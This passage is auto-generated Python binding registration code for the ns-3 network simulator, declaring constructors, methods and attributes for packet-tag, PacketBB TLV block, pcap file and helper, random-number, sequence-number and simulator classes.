## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable]
cls.add_instance_attribute('count', 'uint32_t', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable]
cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable]
cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PbbAddressTlvBlock_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbAddressTlvBlock::PbbAddressTlvBlock(ns3::PbbAddressTlvBlock const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressTlvBlock const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressTlvBlock::PbbAddressTlvBlock() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressTlvBlock::Back() const [member function]
cls.add_method('Back',
'ns3::Ptr< ns3::PbbAddressTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Begin() [member function]
cls.add_method('Begin',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): bool ns3::PbbAddressTlvBlock::Empty() const [member function]
cls.add_method('Empty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::End() [member function]
cls.add_method('End',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressTlvBlock::Front() const [member function]
cls.add_method('Front',
'ns3::Ptr< ns3::PbbAddressTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbAddressTlvBlock::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Insert(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position, ns3::Ptr<ns3::PbbAddressTlv> const tlv) [member function]
cls.add_method('Insert',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position'), param('ns3::Ptr< ns3::PbbAddressTlv > const', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PopBack() [member function]
cls.add_method('PopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PopFront() [member function]
cls.add_method('PopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PushBack(ns3::Ptr<ns3::PbbAddressTlv> tlv) [member function]
cls.add_method('PushBack',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PushFront(ns3::Ptr<ns3::PbbAddressTlv> tlv) [member function]
cls.add_method('PushFront',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): int ns3::PbbAddressTlvBlock::Size() const [member function]
cls.add_method('Size',
'int',
[],
is_const=True)
return
def register_Ns3PbbTlvBlock_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbTlvBlock::PbbTlvBlock(ns3::PbbTlvBlock const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbTlvBlock const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbTlvBlock::PbbTlvBlock() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbTlvBlock::Back() const [member function]
cls.add_method('Back',
'ns3::Ptr< ns3::PbbTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Begin() [member function]
cls.add_method('Begin',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): bool ns3::PbbTlvBlock::Empty() const [member function]
cls.add_method('Empty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::End() [member function]
cls.add_method('End',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbTlvBlock::Front() const [member function]
cls.add_method('Front',
'ns3::Ptr< ns3::PbbTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbTlvBlock::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Insert(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position, ns3::Ptr<ns3::PbbTlv> const tlv) [member function]
cls.add_method('Insert',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position'), param('ns3::Ptr< ns3::PbbTlv > const', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PopBack() [member function]
cls.add_method('PopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PopFront() [member function]
cls.add_method('PopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PushBack(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('PushBack',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PushFront(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('PushFront',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): int ns3::PbbTlvBlock::Size() const [member function]
cls.add_method('Size',
'int',
[],
is_const=True)
return
def register_Ns3PcapFile_methods(root_module, cls):
## pcap-file.h (module 'network'): ns3::PcapFile::PcapFile() [constructor]
cls.add_constructor([])
## pcap-file.h (module 'network'): void ns3::PcapFile::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## pcap-file.h (module 'network'): void ns3::PcapFile::Close() [member function]
cls.add_method('Close',
'void',
[])
## pcap-file.h (module 'network'): static bool ns3::PcapFile::Diff(std::string const & f1, std::string const & f2, uint32_t & sec, uint32_t & usec, uint32_t snapLen=ns3::PcapFile::SNAPLEN_DEFAULT) [member function]
cls.add_method('Diff',
'bool',
[param('std::string const &', 'f1'), param('std::string const &', 'f2'), param('uint32_t &', 'sec'), param('uint32_t &', 'usec'), param('uint32_t', 'snapLen', default_value='ns3::PcapFile::SNAPLEN_DEFAULT')],
is_static=True)
## pcap-file.h (module 'network'): bool ns3::PcapFile::Eof() const [member function]
cls.add_method('Eof',
'bool',
[],
is_const=True)
## pcap-file.h (module 'network'): bool ns3::PcapFile::Fail() const [member function]
cls.add_method('Fail',
'bool',
[],
is_const=True)
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetDataLinkType() [member function]
cls.add_method('GetDataLinkType',
'uint32_t',
[])
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetMagic() [member function]
cls.add_method('GetMagic',
'uint32_t',
[])
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetSigFigs() [member function]
cls.add_method('GetSigFigs',
'uint32_t',
[])
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetSnapLen() [member function]
cls.add_method('GetSnapLen',
'uint32_t',
[])
## pcap-file.h (module 'network'): bool ns3::PcapFile::GetSwapMode() [member function]
cls.add_method('GetSwapMode',
'bool',
[])
## pcap-file.h (module 'network'): int32_t ns3::PcapFile::GetTimeZoneOffset() [member function]
cls.add_method('GetTimeZoneOffset',
'int32_t',
[])
## pcap-file.h (module 'network'): uint16_t ns3::PcapFile::GetVersionMajor() [member function]
cls.add_method('GetVersionMajor',
'uint16_t',
[])
## pcap-file.h (module 'network'): uint16_t ns3::PcapFile::GetVersionMinor() [member function]
cls.add_method('GetVersionMinor',
'uint16_t',
[])
## pcap-file.h (module 'network'): void ns3::PcapFile::Init(uint32_t dataLinkType, uint32_t snapLen=ns3::PcapFile::SNAPLEN_DEFAULT, int32_t timeZoneCorrection=ns3::PcapFile::ZONE_DEFAULT, bool swapMode=false) [member function]
cls.add_method('Init',
'void',
[param('uint32_t', 'dataLinkType'), param('uint32_t', 'snapLen', default_value='ns3::PcapFile::SNAPLEN_DEFAULT'), param('int32_t', 'timeZoneCorrection', default_value='ns3::PcapFile::ZONE_DEFAULT'), param('bool', 'swapMode', default_value='false')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Open(std::string const & filename, std::_Ios_Openmode mode) [member function]
cls.add_method('Open',
'void',
[param('std::string const &', 'filename'), param('std::_Ios_Openmode', 'mode')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Read(uint8_t * const data, uint32_t maxBytes, uint32_t & tsSec, uint32_t & tsUsec, uint32_t & inclLen, uint32_t & origLen, uint32_t & readLen) [member function]
cls.add_method('Read',
'void',
[param('uint8_t * const', 'data'), param('uint32_t', 'maxBytes'), param('uint32_t &', 'tsSec'), param('uint32_t &', 'tsUsec'), param('uint32_t &', 'inclLen'), param('uint32_t &', 'origLen'), param('uint32_t &', 'readLen')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Write(uint32_t tsSec, uint32_t tsUsec, uint8_t const * const data, uint32_t totalLen) [member function]
cls.add_method('Write',
'void',
[param('uint32_t', 'tsSec'), param('uint32_t', 'tsUsec'), param('uint8_t const * const', 'data'), param('uint32_t', 'totalLen')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Write(uint32_t tsSec, uint32_t tsUsec, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('uint32_t', 'tsSec'), param('uint32_t', 'tsUsec'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Write(uint32_t tsSec, uint32_t tsUsec, ns3::Header & header, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('uint32_t', 'tsSec'), param('uint32_t', 'tsUsec'), param('ns3::Header &', 'header'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file.h (module 'network'): ns3::PcapFile::SNAPLEN_DEFAULT [variable]
cls.add_static_attribute('SNAPLEN_DEFAULT', 'uint32_t const', is_const=True)
## pcap-file.h (module 'network'): ns3::PcapFile::ZONE_DEFAULT [variable]
cls.add_static_attribute('ZONE_DEFAULT', 'int32_t const', is_const=True)
return
def register_Ns3PcapHelper_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::PcapHelper::PcapHelper(ns3::PcapHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PcapHelper const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::PcapHelper::PcapHelper() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): ns3::Ptr<ns3::PcapFileWrapper> ns3::PcapHelper::CreateFile(std::string filename, std::_Ios_Openmode filemode, uint32_t dataLinkType, uint32_t snapLen=65535, int32_t tzCorrection=0) [member function]
cls.add_method('CreateFile',
'ns3::Ptr< ns3::PcapFileWrapper >',
[param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode'), param('uint32_t', 'dataLinkType'), param('uint32_t', 'snapLen', default_value='65535'), param('int32_t', 'tzCorrection', default_value='0')])
## trace-helper.h (module 'network'): std::string ns3::PcapHelper::GetFilenameFromDevice(std::string prefix, ns3::Ptr<ns3::NetDevice> device, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromDevice',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'useObjectNames', default_value='true')])
## trace-helper.h (module 'network'): std::string ns3::PcapHelper::GetFilenameFromInterfacePair(std::string prefix, ns3::Ptr<ns3::Object> object, uint32_t interface, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromInterfacePair',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::Object >', 'object'), param('uint32_t', 'interface'), param('bool', 'useObjectNames', default_value='true')])
return
def register_Ns3PcapHelperForDevice_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::PcapHelperForDevice::PcapHelperForDevice(ns3::PcapHelperForDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PcapHelperForDevice const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::PcapHelperForDevice::PcapHelperForDevice() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool promiscuous=false, bool explicitFilename=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'promiscuous', default_value='false'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, std::string ndName, bool promiscuous=false, bool explicitFilename=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('std::string', 'ndName'), param('bool', 'promiscuous', default_value='false'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, ns3::NetDeviceContainer d, bool promiscuous=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('ns3::NetDeviceContainer', 'd'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, ns3::NodeContainer n, bool promiscuous=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('ns3::NodeContainer', 'n'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, uint32_t nodeid, uint32_t deviceid, bool promiscuous=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcapAll(std::string prefix, bool promiscuous=false) [member function]
cls.add_method('EnablePcapAll',
'void',
[param('std::string', 'prefix'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcapInternal(std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool promiscuous, bool explicitFilename) [member function]
cls.add_method('EnablePcapInternal',
'void',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'promiscuous'), param('bool', 'explicitFilename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3RandomVariable_methods(root_module, cls):
cls.add_output_stream_operator()
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable(ns3::RandomVariable const & o) [copy constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'o')])
## random-variable.h (module 'core'): uint32_t ns3::RandomVariable::GetInteger() const [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::RandomVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
return
def register_Ns3RngSeedManager_methods(root_module, cls):
## rng-seed-manager.h (module 'core'): ns3::RngSeedManager::RngSeedManager() [constructor]
cls.add_constructor([])
## rng-seed-manager.h (module 'core'): ns3::RngSeedManager::RngSeedManager(ns3::RngSeedManager const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RngSeedManager const &', 'arg0')])
## rng-seed-manager.h (module 'core'): static uint64_t ns3::RngSeedManager::GetNextStreamIndex() [member function]
cls.add_method('GetNextStreamIndex',
'uint64_t',
[],
is_static=True)
## rng-seed-manager.h (module 'core'): static uint64_t ns3::RngSeedManager::GetRun() [member function]
cls.add_method('GetRun',
'uint64_t',
[],
is_static=True)
## rng-seed-manager.h (module 'core'): static uint32_t ns3::RngSeedManager::GetSeed() [member function]
cls.add_method('GetSeed',
'uint32_t',
[],
is_static=True)
## rng-seed-manager.h (module 'core'): static void ns3::RngSeedManager::SetRun(uint64_t run) [member function]
cls.add_method('SetRun',
'void',
[param('uint64_t', 'run')],
is_static=True)
## rng-seed-manager.h (module 'core'): static void ns3::RngSeedManager::SetSeed(uint32_t seed) [member function]
cls.add_method('SetSeed',
'void',
[param('uint32_t', 'seed')],
is_static=True)
return
def register_Ns3SequenceNumber32_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber32'], root_module['ns3::SequenceNumber32'], param('ns3::SequenceNumber< unsigned int, int > const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber32'], root_module['ns3::SequenceNumber32'], param('int', 'right'))
cls.add_inplace_numeric_operator('+=', param('int', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::SequenceNumber32'], root_module['ns3::SequenceNumber32'], param('int', 'right'))
cls.add_inplace_numeric_operator('-=', param('int', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('>=')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int>::SequenceNumber() [constructor]
cls.add_constructor([])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int>::SequenceNumber(unsigned int value) [constructor]
cls.add_constructor([param('unsigned int', 'value')])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int>::SequenceNumber(ns3::SequenceNumber<unsigned int, int> const & value) [copy constructor]
cls.add_constructor([param('ns3::SequenceNumber< unsigned int, int > const &', 'value')])
## sequence-number.h (module 'network'): unsigned int ns3::SequenceNumber<unsigned int, int>::GetValue() const [member function]
cls.add_method('GetValue',
'unsigned int',
[],
is_const=True)
return
def register_Ns3SequenceNumber16_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber16'], root_module['ns3::SequenceNumber16'], param('ns3::SequenceNumber< unsigned short, short > const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber16'], root_module['ns3::SequenceNumber16'], param('short int', 'right'))
cls.add_inplace_numeric_operator('+=', param('short int', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::SequenceNumber16'], root_module['ns3::SequenceNumber16'], param('short int', 'right'))
cls.add_inplace_numeric_operator('-=', param('short int', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('>=')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short>::SequenceNumber() [constructor]
cls.add_constructor([])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short>::SequenceNumber(short unsigned int value) [constructor]
cls.add_constructor([param('short unsigned int', 'value')])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short>::SequenceNumber(ns3::SequenceNumber<unsigned short, short> const & value) [copy constructor]
cls.add_constructor([param('ns3::SequenceNumber< unsigned short, short > const &', 'value')])
## sequence-number.h (module 'network'): short unsigned int ns3::SequenceNumber<unsigned short, short>::GetValue() const [member function]
cls.add_method('GetValue',
'short unsigned int',
[],
is_const=True)
return
def register_Ns3SequentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(ns3::SequentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SequentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, double i=1, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('double', 'i', default_value='1'), param('uint32_t', 'c', default_value='1')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, ns3::RandomVariable const & i, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('ns3::RandomVariable const &', 'i'), param('uint32_t', 'c', default_value='1')])
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Simulator_methods(root_module, cls):
## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function]
cls.add_method('Cancel',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function]
cls.add_method('Destroy',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function]
cls.add_method('GetImplementation',
'ns3::Ptr< ns3::SimulatorImpl >',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function]
cls.add_method('GetMaximumSimulationTime',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function]
cls.add_method('IsExpired',
'bool',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function]
cls.add_method('IsFinished',
'bool',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function]
cls.add_method('Now',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function]
cls.add_method('Remove',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function]
cls.add_method('SetImplementation',
'void',
[param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function]
cls.add_method('SetScheduler',
'void',
[param('ns3::ObjectFactory', 'schedulerFactory')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function]
cls.add_method('Stop',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & time) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time const &', 'time')],
is_static=True)
return
def register_Ns3SystemWallClockMs_methods(root_module, cls):
## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs(ns3::SystemWallClockMs const & arg0) [copy constructor]
